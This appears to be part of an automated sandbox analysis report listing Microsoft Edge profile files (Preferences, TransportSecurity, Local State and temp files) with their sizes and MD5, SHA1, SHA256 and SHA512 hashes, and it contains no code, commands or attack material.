a81bb105277742ebde0b1f93a7dfdd49de3c33f673cac33fae3ec51e6ca595c960fc7ee5dfc0c189f56ed5fb559bd1a19432e89ae3a5adf53a5bf6d4b2268d1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
47bc0ecf0e6aa56164558bbeb31026aa

SHA1
cacfa46cbcddd65dd6b119958cf0f8a2eb421065

SHA256
bf69021e9fd451165515336de376ac3fc5e6424c50f466f641f6986ce7e9ef1a

SHA512
a7a5b64e387559343f61e09664a1cbe8b68ed89db2a3e4fcf497ce01a42b073394101cd197685a154aa5ce6a7c403072d4cefacc6135c0fbc3af935b0abf6b5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
0c47e46ba4db54d69a9dbd6592949867

SHA1
9f71b25d54c757094a03d2fecb59e5221af177e2

SHA256
0aa89ab1d20e06a0f5dce79d27acced48df485fa5be144379e5df24fe365848e

SHA512
f1c3ff3102ccd032ac3d1669db845fe7c6490b96a4edfe6fca9a6b61d0ec4822e5c29f9fb6d874626adf8a427f964cc5a66486d1a98bb33b4e21e0408b07810a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
703b0de449a8d1b5a5b0e9820ac2b1be

SHA1
a06fe89435692f87c55b6fa87afcb49adcec5bc3

SHA256
4e6f157c03e7b0051a3b0028e63c8219b1f0ea9419119aa21788ffbadc47c45f

SHA512
c7a761b4c08b4f28ae806d3d5c0fcc6ef53643733e9757eed23609b20f8a104da2f1abc8673e5256075ce6fb8326b2946b217499154e3c5b63cc6c2e79dd4936

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
cb61bf8cc86db5c52816aab126b6579e

SHA1
d0661a0fcdef50955d431aaedd79a3d0b4d17fce

SHA256
579a6e2a9533cb100cba054d8d6e6ad57849efb8801711372f98d2689af83a53

SHA512
d92d4840edcc34f9b5f6933735042c5b83cf8319e1a113b049f279d8bdca47291342611eebfaaefcd8cac6234c2c98853fce60a7577aca23d7cf89e076f00fdc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
d603adcade1fbad9e72d2b63f941bb54

SHA1
b78ff9a8c92c3086c00cf097abc6a2dedea106c7

SHA256
a8652935728336cad21f850e404859c0fbdc91970d255f5c2ff808aed3e993a9

SHA512
0ba7fdbb4068086a4e81124e77e3351f0c6694afff06c7067d97ac7b3443ae1ea4772861ddd4f2a64bb0abb5472b996ffa62ff32a2a44a2a3cbd97bc2ee82a8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
40672f3a0bfed04b1539a0c498630e49

SHA1
70bd5ac85478127b58fcf303b79247119a649e2c

SHA256
1484723157ff05cc9bfdacd75f029f2d4a8f2523c3a943e76b211f70aaeff8dd

SHA512
fd85c9993b92886f3864917e2e9e9433ad3766973cef235fb113589691a5d4976490756f82a5696a3dc065503e133544ffe75248b4a48ad9dcbdd5b7a7d0625f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\bf31367e-b165-4718-b38d-ab101832327b.tmp

Filesize
955B

MD5
674873a83c06bb7e6113946265c84479

SHA1
f6283fad0bda4c62b31f8a584d7f8efd6d53b76e

SHA256
272131f97a32a544b7fce5d4c879c1d431f4b3604333e11b5bf530f23761bb09

SHA512
7cdb2e3106e21f5519e566f19f3bef6c4d508261b22119093ba57aa6544a5e85b814a0a7ab2577e1d014b78186b62c73c216dc7e2c380f2f6b1b049ed9ccc043

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
743080519dd53dbd87277d244751c484

SHA1
709a98b303c0d0804961354076e8f0019dabb565

SHA256
0da153837a96651b2093af2a7661b79894588cbd18defa160f2e028a427e79e5

SHA512
25099c41b27623d6ac289af9ff33aa89e6b69f47f977b879f22ebb1f9c7076197829095211f8195c9fe2f75af1c22b4070aa2921d5c07b12d7ab56dc9128c8aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
1b85d724c20bcf61f4df4093e9d33d8a

SHA1
b200caf1d14a5a2ad28f084f0fbf1bebc1717ed0

SHA256
496fe488f6e8f0b5035df654e5ebbd2d8f3a5443f0e5576c7f7eb7a6e5cdfbda

SHA512
d7bc5fb37f4f01ad09f8f9737f1479263db715ebae4cd1d82dfa757a4189c9fb6478385247992da2b17daf9e2f2ed1d40fc4d964c8a034b561e80d05f2839946

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
f4b8b6f6a558a87609695176b3ad2fb7

SHA1
fbc665f07f948b4ab7138f91c0ba619d84dc9e35

SHA256
6ee6ea281beb104df006f19285fa7dc8968cbf4fc596bdb767973e39ef9d206c

SHA512
93b41ffe6300d23e31950d0fbd9711dd5faec7d001d95bbd8ab6847738b7d453a3e84a636c8ec2300d6dfe5512f524008313c9dda837798c5c09e8af7b141b0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6ccc05589bb86d36bb6ebe352ed4c98f

SHA1
9b9d2cd8afcbbbe8ddbb3c0070adcd3987a2b6d3

SHA256
a747c2857457ffcf2f5a8ff679ab0e2814b6b910a9acaa568beb5e385db25d5e

SHA512
a313f899ecffb16cd1c613ad1385fa29c5219ab4320b165657b8847984bc8a07887b4ef3130b02aabe4a72545e4404e4f33b1866e6f812c9a33b08bd3bb1a7ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\b12caffb-5888-424e-9219-148e604e5730.tmp

Filesize
8KB

MD5
39c50b5c286962034a5252eaeea291f0

SHA1
1788ec95668abef1179f6e8b397579f94e1baa24

SHA256
09fbb8f6d5f3b247c8e99fd225d66cffa96a7d453e176e1d14bfb978fbc39972

SHA512
cd31e54701cd184698b6ae1e6e04eb0f744d52fc5eebe0ef9d9b3a0fc0ae6c9765e59249e6cb8eba7271919f091ba5a09ebaf20e33282ebdd5a12047ff8ae151

Download Submit